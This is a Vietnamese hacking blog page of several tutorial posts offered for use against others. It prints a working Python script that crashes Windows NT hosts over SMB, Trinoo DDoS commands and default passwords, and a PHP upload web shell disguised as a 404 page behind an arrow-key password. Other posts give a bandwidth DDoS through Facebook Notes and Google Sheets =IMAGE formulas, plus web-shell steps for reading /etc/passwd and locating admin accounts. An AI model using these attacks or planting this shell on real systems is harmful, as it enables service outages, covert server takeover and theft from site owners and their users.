Home Blog Page 13

Làm thế nào để trở thành Hacker ( Part 6 )

0

PART 6

 

Có nhiều bạn hỏi các cách tấn công DOS, DDOS mà không sử dụng Facebook và Google nên mình viết bài này, hướng dẫn các bạn dùng các cách DOS, DDOS khác như dùng python hay trinoo  😀

38 . ) DoS attack là gì ? ( Denial Of Services Attack )

_ DoS attack ( dịch là tấn công từ chối dịch vụ ) là kiểu tấn công rất lợi hại , với loại tấn công này , bạn chỉ cần một máy tính kết nối Internet là đã có thể thực hiện việc tấn công được máy tính của đốI phương . thực chất của DoS attack là hacker sẽ chiếm dụng một lượng lớn tài nguyên trên server ( tài nguyên đó có thể là băng thông, bộ nhớ, cpu, đĩa cứng, … ) làm cho server không thể nào đáp ứng các yêu cầu từ các máy của nguời khác ( máy của những người dùng bình thường ) và server có thể nhanh chóng bị ngừng hoạt động, crash hoặc reboot .

39 . ) Các loại DoS attack hiện đang được biết đến và sử dụng :

a . ) Winnuke :

_DoS attack loại này chỉ có thể áp dụng cho các máy tính đang chạy Windows9x . Hacker sẽ gởi các gói tin với dữ liệu “Out of Band” đến cổng 139 của máy tính đích.( Cổng 139 chính là cổng NetBIOS, cổng này chỉ chấp nhận các gói tin có cờ Out of Band được bật ) . Khi máy tính của victim nhận được gói tin này, một màn hình xanh báo lỗi sẽ được hiển thị lên với nạn nhân do chương trình của Windows nhận được các gói tin này nhưng nó lại không biết phản ứng với các dữ liệu Out Of Band như thế nào dẫn đến hệ thống sẽ bị crash .

b . ) Ping of Death :

_ Ở kiểu DoS attack này , ta chỉ cần gửi một gói dữ liệu có kích thước lớn thông qua lệnh ping đến máy đích thì hệ thống của họ sẽ bị treo .
_ VD : ping –l 65000

c . ) Teardrop :

_ Như ta đã biết , tất cả các dữ liệu chuyển đi trên mạng từ hệ thống nguồn đến hệ thống đích đều phải trải qua 2 quá trình : dữ liệu sẽ được chia ra thành các mảnh nhỏ ở hệ thống nguồn, mỗi mảnh đều phải có một giá trị offset nhất định để xác định vị trí của mảnh đó trong gói dữ liệu được chuyển đi. Khi các mảnh này đến hệ thống đích, hệ thống đích sẽ dựa vào giá trị offset để sắp xếp các mảnh lại với nhau theo thứ tự đúng như ban đầu . Lợi dụng sơ hở đó , ta chỉ cần gởi đến hệ thống đích một loạt gói packets với giá trị offset chồng chéo lên nhau. Hệ thống đích sẽ không thể nào sắp xếp lại các packets này, nó không điều khiển được và có thể bị crash, reboot hoặc ngừng hoạt động nếu số lượng gói packets với giá trị offset chồng chéo lên nhau quá lớn !

d . ) SYN Attack :

_ Trong SYN Attack, hacker sẽ gởi đến hệ thống đích một loạt SYN packets với địa chỉ ip nguồn không có thực. Hệ thống đích khi nhận được các SYN packets này sẽ gởi trở lại các địa chỉ không có thực đó và chờ đợI để nhận thông tin phản hồi từ các địa chỉ ip giả . Vì đây là các địa chỉ ip không có thực, nên hệ thống đích sẽ sẽ chờ đợi vô ích và còn đưa các “request” chờ đợi này vào bộ nhớ , gây lãng phí một lượng đáng kể bộ nhớ trên máy chủ mà đúng ra là phải dùng vào việc khác thay cho phải chờ đợi thông tin phản hồi không có thực này . Nếu ta gởi cùng một lúc nhiều gói tin có địa chỉ IP giả như vậy thì hệ thống sẽ bị quá tải dẫn đến bị crash hoặc boot máy tính . == > ném đá dấu tay .

e . ) Land Attack :

_ Land Attack cũng gần giống như SYN Attack, nhưng thay vì dùng các địa chỉ ip không có thực, hacker sẽ dùng chính địa chỉ ip của hệ thống nạn nhân. Điều này sẽ tạo nên một vòng lặp vô tận giữa trong chính hệ thống nạn nhân đó, giữa một bên cần nhận thông tin phản hồi còn một bên thì chẳng bao giờ gởi thông tin phản hồi đó đi cả . == > Gậy ông đập lưng ông .

f . ) Smurf Attack :

_Trong Smurf Attack, cần có ba thành phần: hacker (người ra lệnh tấn công), mạng khuếch đại (sẽ nghe lệnh của hacker) và hệ thống của nạn nhân. Hacker sẽ gởi các gói tin ICMP đến địa chỉ broadcast của mạng khuếch đại. Điều đặc biệt là các gói tin ICMP packets này có địa chỉ ip nguồn chính là địa chỉ ip của nạn nhân . Khi các packets đó đến được địa chỉ broadcast của mạng khuếch đại, các máy tính trong mạng khuếch đại sẽ tưởng rằng máy tính nạn nhân đã gởi gói tin ICMP packets đến và chúng sẽ đồng loạt gởi trả lại hệ thống nạn nhân các gói tin phản hồi ICMP packets. Hệ thống máy nạn nhân sẽ không chịu nổi một khối lượng khổng lồ các gói tin này và nhanh chóng bị ngừng hoạt động, crash hoặc reboot. Như vậy, chỉ cần gởi một lượng nhỏ các gói tin ICMP packets đi thì hệ thống mạng khuếch đại sẽ khuếch đại lượng gói tin ICMP packets này lên gấp bộI . Tỉ lệ khuếch đại phụ thuộc vào số mạng tính có trong mạng khuếch đạI . Nhiệm vụ của các hacker là cố chiếm được càng nhiều hệ thống mạng hoặc routers cho phép chuyển trực tiếp các gói tin đến địa chỉ broadcast không qua chỗ lọc địa chỉ nguồn ở các đầu ra của gói tin . Có được các hệ thống này, hacker sẽ dễ dàng tiến hành Smurf Attack trên các hệ thống cần tấn công . == > một máy làm chẳng si nhê , chục máy chụm lại ta đành chào thua .

g . ) UDP Flooding :

_ Cách tấn công UDP đòi hỏi phải có 2 hệ thống máy cùng tham gia. Hackers sẽ làm cho hệ thống của mình đi vào một vòng lặp trao đổi các dữ liệu qua giao thức UDP. Và giả mạo địa chỉ ip của các gói tin là địa chỉ loopback ( 127.0.0.1 ) , rồi gởi gói tin này đến hệ thống của nạn nhân trên cổng UDP echo ( 7 ). Hệ thống của nạn nhân sẽ trả lời lại các messages do 127.0.0.1( chính nó ) gởi đến , kết quả là nó sẽ đi vòng một vòng lặp vô tận. Tuy nhiên, có nhiều hệ thống không cho dùng địa chỉ loopback nên hacker sẽ giả mạo một địa chỉ ip của một máy tính nào đó trên mạng nạn nhân và tiến hành ngập lụt UDP trên hệ thống của nạn nhân . Nếu bạn làm cách này không thành công thì chính máy của bạn sẽ bị đấy .

h . ) Tấn công DNS :

_ Hacker có thể đổi một lối vào trên Domain Name Server của hệ thống nạn nhân rồi cho chỉ đến một website nào đó của hacker. Khi máy khách yêu cầu DNS phân tích địa chỉ bị xâm nhập thành địa chỉ ip, lập tức DNS ( đã bị hacker thay đổi cache tạm thời ) sẽ đổi thành địa chỉ ip mà hacker đã cho chỉ đến đó . Kết quả là thay vì phải vào trang Web muốn vào thì các nạn nhân sẽ vào trang Web do chính hacker tạo ra . Một cách tấn công từ chối dịch vụ thật hữu hiệu !.

g . ) Distributed DoS Attacks ( DDos ) :

_ DDoS yêu cầu phải có ít nhất vài hackers cùng tham gia. Đầu tiên các hackers sẽ cố thâm nhập vào các mạng máy tính được bảo mật kém, sau đó cài lên các hệ thống này chương trình DDoS server. Bây giờ các hackers sẽ hẹn nhau đến thời gian đã định sẽ dùng DDoS client kết nối đến các DDoS servers, sau đó đồng loạt ra lệnh cho các DDoS servers này tiến hành tấn công DDoS đến hệ thống nạn nhân .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

_ Đây có lẽ là kiểu tấn công lợi hại nhất và làm boot máy tính của đối phương nhanh gọn nhất . Cách làm thì cũng tương tự như DDos nhưng thay vì tấn công bằng nhiều máy tính thì người tấn công chỉ cần dùng một máy tấn công thông qua các server lớn trên thế giới . Vẫn với phương pháp giả mạo địa chỉ IP của victim , kẻ tấn công sẽ gởi các gói tin đến các server mạnh nhất , nhanh nhất và có đường truyền rộng nhất như Yahoo .v.v… , các server này sẽ phản hồi các gói tin đó đến địa chỉ của victim . Việc cùng một lúc nhận được nhiều gói tin thông qua các server lớn này sẽ nhanh chóng làm nghẽn đường truyền của máy tính nạn nhân và làm crash , reboot máy tính đó . Cách tấn công này lợi hại ở chỗ chỉ cần một máy có kết nối Internet đơn giản với đường truyền bình thường cũng có thể đánh bật được hệ thống có đường truyền tốt nhất thế giới nếu như ta không kịp ngăn chặn . Trang Web Anonymousvn.tk của chúng ta cũng bị DoS vừa rồi bởi cách tấn công này đấy .-_-

40 . ) Kỹ thuật DoS Web bằng Python :

_ Kỹ thuật này chỉ có thể sử dụng duy nhất trên WinNT , và bạn cần phải có thời gian thì máy tính của nạn nhân mới bị down được .
_ Bạn hãy download Pyphon tại http://www.python.org/ để sử dụng .
_ Bạn hãy save đoạn mã sau lên file rfpoison.py .

CODE
import string
import struct
from socket import *
import sys
def a2b(s):
bytes = map(lambda x: string.atoi(x, 16),
string.split(s))
data = string.join(map(chr, bytes), ”)
return data
def b2a(s):
bytes = map(lambda x: ‘%.2x’ % x, map(ord, s))
return string.join(bytes, ‘ ‘)

# Yêu cầu tập hợp NBSS
nbss_session = a2b(“””
81 00 00 48 20 43 4b 46 44 45
4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45
42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46
43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00
00 00
“””)

# Tạo SMB
crud = (
# Yêu cầu SMBnegprot
“””
ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
“””,
# Yêu cầu setup SMB X
“””
ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00
“””,
# Yêu cầu SMBtconX
“””
ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00
“””,
# Yêu cầu khởI tạo SMBnt X
“””
ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00
“””,
# yêu cầu biên dịch SMB
“””
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
“””,
# SMBtrans Request
“””
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
“””
)
crud = map(a2b, crud)
def smb_send(sock, data, type=0, flags=0):
d = struct.pack(‘!BBH’, type, flags, len(data))
#print ‘send:’, b2a(d+data)
sock.send(d+data)
def smb_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
type, flags, length = struct.unpack(‘!BBH’, s)
data = sock.recv(length)
assert(len(data) == length)
#print ‘recv:’, b2a(s+data)
return type, flags, data
def nbss_send(sock, data):
sock.send(data)
def nbss_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
return s
def main(host, port=139):
s = socket(AF_INET, SOCK_STREAM)
s.connect(host, port)
nbss_send(s, nbss_session)
nbss_recv(s)
for msg in crud[:-1]:
smb_send(s, msg)
smb_recv(s)
smb_send(s, crud[-1]) # no response to this
s.close()
if __name__ == ‘__main__’:
print ‘Sending poison…’,
main(sys.argv[1])
print ‘done.’

Để có thể làm down được server của đối phương bạn cần phải có thời gian DoS , nếu không có điều kiện chờ đợi tốt nhất bạn không nên sử dụng cách này . Nhưng “vọc” thử cho biết thì được đúng không ?

41 . ) Tấn công DDoS thông qua Trinoo :

_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu. Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định .
_ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source —–> Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống .

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is ‘^]’.
kwijibo
Connection closed by foreign host. < == Bạn đã nhập sai

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is ‘^]’.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo> < == bạn đã vào được hệ thống trinoo

_ Đây là vài passwd mặc định :

“l44adsl”: pass của trinoo daemon .
“gorave”: passwd của trinoo master server khi startup .
“betaalmostdone”: passwd điều khiển từ xa chung cho trinoo master .
“killme”: passwd trinoo master điều khiển lệnh “mdie” .

_ Đây là một số lệnh dùng để điều khiển Master Server:

CODE
die————————————————————Shutdown.
quit————————————————————Log off.
mtimer N—————————————————-Đặt thờI gian để tấn công DoS , với N nhận giá trị từ 1–> 1999 giây .
dos IP——————————————————-Tấn công đến một địa chỉ IP xác định .
mdie pass—————————————————Vô hiệu hoá tất cả các Broadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới (“d1e l44adsl”) Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này
mping——————————————————–Gửi một lệnh ping tới (“png l44adsl”) c¸c Broadcast.
mdos <ip1:ip2..> ——————————————Send nhiều lênh DOS (“xyz l44adsl 123:ip1:ip2”) đến các Broadcast.
info————————————————————-Hiển thị thông tin về Trinoo .
msize———————————————————-Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS.
nslookup host———————————————-Xác định tên thiết bị của Host mà Master Trinoo đang chạy .
usebackup—————————————————Chuyển tới các file Broadcast sao lưu được tạo bởi lệnh “killdead”.
bcast———————————————————–Liệt kê danh sách tất cả các Broadcast có thể khai thác .
help [cmd] —————————————————Đưa ra danh sách các lệnh .
mstop———————————————————–Ngừng lại các cuốc tấn công DOS .

_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:

CODE
aaa pass IP—————————————————-Tấn công đến địa chỉ IP đã xác định . Gửi gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1–>1999 s .
bbb pass N—————————————————–Đặt thời gian giới hạn cho các cuộc tấn công DOS .
Shi pass——————————————————–Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP.
png pass——————————————————-Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP.
die pass——————————————————–Shutdown Trinoo.
rsz N————————————————————Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte .
xyz pass 123:ip1:ip3—————————————-tấn công DOS nhiều mục tiêu cùng lúc .

Còn nhiều đoạn mã và cách ứng dụng để DoS lắm , các bạn chịu khó tìm hiểu thêm nhé . Nhưng đừng tấn công lung tung , nhất là server của anonymousvn.tk nhé, coi chừng không thu được hiệu quả mà còn bị lock nick nữa đó . Thân .

GOODLUCK!!!!!!!!!!!!!!!!

 

Các bài viết liên quan

Part 7

Part 5

Part 4

Part 3

Part 2

Part 1

 

Series : Làm sao để trở thành hacker

loading...

Hướng dấn ngụy trang shell độc đáo

0

Các bạn tạo một file shell php có nội dung như sau

 

<?php
if(isset($_FILES[“File”]))
{
define(“DS”,DIRECTORY_SEPARATOR);
echo “<body style=’background:#000;color:#66ff00′>”;
$Path=explode(DS,__FILE__);
unset($Path[count($Path)-1]);
$Path=implode(DS,$Path);
$Path.=DS.$_FILES[“File”][“name”];
if ($_FILES[“File”][“error”] > 0)
{
echo “Error: ” . $_FILES[“File”][“error”] . “<br />”;
}
else if(move_uploaded_file($_FILES[“File”][“tmp_name”],$Path))
{
echo “Stored in: ” .$Path;
@chmod($Path,0755);
}
echo “</body>”;
exit;
}
?>
<!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>
<html><head>
<title>404 Not Found</title>
<script type=”text/javascript” src=”http://code.jquery.com/jquery-1.8.1.min.js”></script>
<script type=”text/javascript”>
$(document).ready(function(){
var password=”[left][right][left][right][up][down]”;
var passwordType=””;
$(‘body’).keydown(function(e) {
if(passwordType==”[END]”){return false;}
switch(eval(e.which))
{
case 37:{
passwordType+=”[left]”;
break;
}
case 38:{
passwordType+=”[up]”;
break;
}
case 39:{
passwordType+=”[right]”;
break;
}
case 40:{
passwordType+=”[down]”;
break;
}
default:{
passwordType+=””;
break;
}
}
if(passwordType.indexOf(password)>=0)
{
passwordType=”[END]”;
$(“body”).fadeOut(1000,function(){
$(“body”).css({“background”:”#000000″,”color”:”#66 ff00″});
$(“body”).fadeIn(1000,function(){
$(“body h1”).fadeOut(500,function(){
$(“body h1”).html(“Welcome back, my Hacker !”);
$(“body h1”).fadeIn(500);
$(“body p”).eq(0).fadeOut(500,function(){
$(this).html(“<form method=’post’ enctype=’multipart/form-data’>Select file to upload: <input type=’file’ name=’File’/><input type=’submit’/>”);
$(this).fadeIn(500);
$(“title”).html(“Hacked !!!!”);
$(“p”).eq(1).html(“”);
$(“address”).html(“Coded by Hacker Anonymous Viet Nam !”);
});
});
});
});
}
});
});
</script>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?=$_SERVER[‘REQUEST_URI’]?> was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_qos/9.74 mod_bwlimited/1.4 Server at <?=$_SERVER[‘SERVER_NAME’]?> Port 80</address>
</body></html>

 

Up load file lên host và chạy, các bạn sẽ nhận được một trang lỗi 404 Not Found, bình tĩnh và bấm lần lượt các phím [trái] [phải] [trái] [phải] [lên] [xuống]

Các bạn cũng có thể chỉnh lại mật khẩu với các lệnh [left][up][right][down]

var password=”[left][right][left][right][up][down]”

loading...

Một số điều có thể bạn không bao giờ biết về facebook

0

Một vài điều nhỏ nhặt :))

1.Facebook có thể login bằng các pass khác nhau.
Có nghĩa là bạn có thể có nhiều pass khác nhau.Sau đây là các pass tương đương nhau.
Ví dụ mình có pass là sAd_CaPuChiNo .Nếu mình hoán đổi các kí tự in hoa bằng kí tự thường và ngược lại.Được pass mới là SaD_cApUcHInO .Thi đây là một pass hợp lệ.Có thể login được. Họăc nếu viết hoa kí tự đầu SAd_CaPuChiNo thì đây cũng là 1 pass hợp lệ.

2.Có thể bypass verify Phone khi đăng kí Gmail ,facebook, yahoo

Bạn có thể vào 1 trong các site sau đây Link 1 hoặc Link 2.Vào đó chọn 1 số nào đó,rồi nhập số đó vào nơi yêu cầu bạn phone verification.Và bạn sẽ nhận được code xác nhận ở trang này.

3. Fake ip siêu nhanh bằng cách cài addon “AnonymoX Add Ons” trên firefox.

4. Có thể remove pass file rar .

Bằng cách vào trang này Convert up file cần lên.Bạn sẽ nhận được một file không còn pass.Và nội dung cũng biến mất luôn =))

 

Blog có nút chia sẻ để mọi người có thể chia sẻ những kiến thức hay tới mọi người khác nha 😀

 

loading...

[DDOS] Sử dụng Facebook Notes và Google SpreadSheet để chiếm băng thông website

0
Các cơ chế proxy preload của các Mạng XH ( vd: Facebook ) và các Cloud Application ( vd: Google Docs ) tiềm tàng một nguy cơ là có thể bị “mượn tay” để tấn công DDoS hoặc tấn công chiếm băng thông
Qua thử nghiệm các Vul này trên Facebook thì trong 2 phút, nó nuốt trôi hơn 8GB băng thông
Nếu kết hợp cùng lúc nhiều account, nhiều dịch vụ cloud khác nhau ( có hỗ trợ proxy preload ) thì khả năng nạn nhân bị DoS và bị disable dịch vụ hosting vì hết băng thông rất cao
Cách thực hiện thử nghiệm:
Cần có:
Mua một VPS làm nạn nhân thử nghiệm
VPS cài iftop hoặc bất kỳ công cụ nào để xem băng thông bị chiếm dụng
Upload một file bất kỳ có kích thước > 10MB lên VPS. vd: test.pdf . Ghi lại URL tới file này ( vd: http://anonymousvn.tk/test.pdf )
Thực hiện tấn công với Facebook Notes:
Tạo một account Facebook bất kỳ, tạo Facebook Note với nội dung, chứa khoảng 1000 dòng như sau :
<img src=’http://anonymousvn.tk/test.pdf?r=1’/>
<img src=’http://anonymousvn.tk/test.pdf?r=2’/>
<img src=’http://anonymousvn.tk/test.pdf?r=3’/>
<img src=’http://anonymousvn.tk/test.pdf?r=4’/>
<img src=’http://anonymousvn.tk/test.pdf?r=5’/>
Chú ý sẽ thấy sau mỗi url sẽ có thêm một biến số bất kỳ với giá trị tăng dần, đây là chỗ làm tăng tốc và mức độ nguy hại của phương thức DoS này.
Mỗi dòng khi load lên sẽ gửi một request tới nạn nhân, 1000 dòng tương đường với 1000 request download file PDF 10MB như trên, tương đương 10GB băng thông bị ngốn.

Thực hiện tấn công với Google Docs: 

Tạo một file Google Docs Spreadsheet với 1000 dòng nội dung, mỗi dòng có nội dung tương tự như sau: 
=IMAGE(http://anonymousvn.tk/test.pdf?r=1)
=IMAGE(http://anonymousvn.tk/test.pdf?r=2)
=IMAGE(http://anonymousvn.tk/test.pdf?r=3)
=IMAGE(http://anonymousvn.tk/test.pdf?r=4)
=IMAGE(http://anonymousvn.tk/test.pdf?r=5)
Cách thức tăng mức độ nguy hại của kiểu tấn công này: 
– Phối hợp giữa Facebook Notes DDoS và Google Spreadsheet DDoS
– Refresh liên tục các trang notes và các trang spreadsheet
– Dùng nhiều account để mở nhiều trang notes và các trang spreadsheet
– Dùng nhiều máy tính + nhiều account để mở nhiều trang notes và các trang spreadsheetVới cách thức DDoS này thì băng thông tối đa có thể DDoS được lên đến 800Mbps. Và lưu lượng băng thông bị ngốn là rất lớn. Nếu gặp các dịch vụ hosting có giới hạng băng thông tối đa hàng tháng thì nạn nhân nhanh chóng bị ISP ngưng dịch vụ vì hết bandwidth limit của tháng.
Nguồn : Google 😀
loading...

Cơ bản về cách sử dụng các shell phổ biến

0

Ở bài này mình sẽ hướng dẫn với một số shell phổ biến như R57, c100,c99,b374k,v…v… Với các shell khác có chức năng tương tự các bạn tự tìm hiểu nhé. Vì nó không khác nhau là mấy nên bây giờ mình sẽ bắt đầu:

Sau khi upload shell thành công lên một web, nhiều bạn sẽ rất bỡ ngỡ khi vào giao diện của một con shell vì nó rất nhiều câu lệnh,  vùng chọn và chữ 😀 tuy nhiên bạn có thể thấy đơn giản hơn như sau

Hoặc như

Bạn có thể thấy phần rộng nhất là phần quản lý File Manager của trang, nhiều bạn up shell và sử dụng shell chỉ dùng đến chức năng này tuy nhiên nếu để tìm tất cả như mật khẩu thành viên, email và thông tin của họ thì sẽ rất lâu và có nhiều người sẽ không thể tìm ra được

Lúc này chúng ta sẽ phải dùng đến các lệnh cơ bản, có thể áp dụng được trong tất cả các command của các loại shell

+ Lệnh 1 dùng để get list user

cat /etc/passwd
less /etc/passwd

Nếu Safe mode on thì có thể up file sau lên server và chạy

$i = 0;
while ($i < 60000)
{
$line = posix_getpwuid($i);
if (!empty($line))
{
while (list ($key, $vl) = each($line)){
echo $vl.”n”;
break;
}
}
$i++;
}
?>

include(“/etc/passwd”); ?>

(Do file chứa user là passwd, còn file chứa pass thường là shadow, nhưng chúng ta ko xem được, phải get root)

Nhớ là để đuôi PHp nhé :v

+ Lệnh 2

Lệnh này dùng để check các path và có thể tìm được tài khoản của admin web, ở bước một chúng ta mới chỉ tìm ra user nhưng không biết user nào là của admin, bước hai chúng ta sẽ thực hiện việc đó qua lệnh

find /usr/local/apache/logs/ -name ‘error_log’ | xargs grep -E ‘domain.com’

sau khi ra được thì phải check lại một lần nữa xem đúng không bằng cách chạy ip server

http://ip của sver/~user

Nếu ra site đang local thì đúng rồi 😀

+ Lệnh 3

Xem một file trên host

cat /home/user/public_html/1.php (xem file 1.php)

+Lệnh 4

Xem một đường dẫn trên host

dir /home/user/public_html/abc( Xem thư mục abc )

loading...

Làm thế nào để trở thành Hacker (Part 5 )

1

PART 5

31 . ) Gói tin TCP/IP là gì?

TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, một Gói tin TCP/IP là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một người khác!! Bạn có thể dùng cách này để tìm cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương trình cho phép bạn làm điều này.

32 . ) Linux là gi`:

_Nói theo nghĩa gốc, Linux là nhân ( kernel ) của HĐH. Nhân là 1 phần mềm đảm trách chức vụ liên lạc giữa các chương trình ứng dụng máy tính và phần cứng. Cung cấp các chứng năng như: quản lý file, quản lý bộ nhớ ảo, các thiết bị nhập xuất nhưng ổ cứng, màn hình, bàn phím, …. Nhưng Nhân Linux chưa phải là 1 HĐH, vì thế nên Nhân Linux cần phải liên kết với những chương trình ứng dụng được viết bởi tổ chức GNU tạo lên 1 HĐH hoàn chỉnh: HĐH Linux. Đây cũng là lý do tại sao chúng ta thấy GNU/Linux khi được nhắc đến Linux.
Tiếp theo, 1 công ty hay 1 tổ chức đứng ra đóng gói các sản phẩm này ( Nhân và Chương trình ứng dụng ) sau đó sửa chữa một số cấu hình để mang đặc trưng của công ty/ tổ chức mình và làm thêm phần cài đặt ( Installation Process ) cho bộ Linux đó, chúng ta có : Distribution. Các Distribution khác nhau ở số lượng và loại Software được đóng gói cũng như quá trình cài đặt, và các phiên bản của Nhân. 1 số Distribution lớn hiện nay của Linux là : Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Các lệnh căn bản cần biết khi sử dụng hoặc xâm nhập vào hệ thống Linux :

_ Lệnh ” man” : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới lệnh nay :
Cấu trúc lệnh : $ man .
Ví dụ : $ man man
_ Lệnh ” uname “: cho ta biết các thông tin cơ bản về hệ thống
Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .
Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống
Ví dụ : $ps axuw
_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .
Ví du : $ cd /usr/bin —-> nó sẽ đưa bạn đến thư mục bin
_ Lệnh mkdir : tạo 1 thư mục .
Ví dụ : $ mkdir /home/convit —> nó sẽ tạo 1 thư mục convit trong /home
_ Lệnh rmdir : gỡ bỏ thư mục
Ví dụ : $ rmdir /home/conga —-> nó sẽ gỡ bỏ thư mục conga trong /home .
_ Lệnh ls: liệt kê nội dung thư mục
Ví dụ : $ls -laR /
_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .
Ví dụ : $printf %s “x41x41x41x41”
_ Lệnh pwd: đưa ra thư mục hiện hành
Ví dụ : $pwd ——> nó sẽ cho ta biết vị trí hiện thời của ta ở đâu : /home/level1
_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file
Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah —–>nó sẽ del file blah .
Làm tương tự đối với các lệnh cp , mv .
_ Lệnh find : tìm kiếm file, thư mục
Ví dụ : $find / -user level2
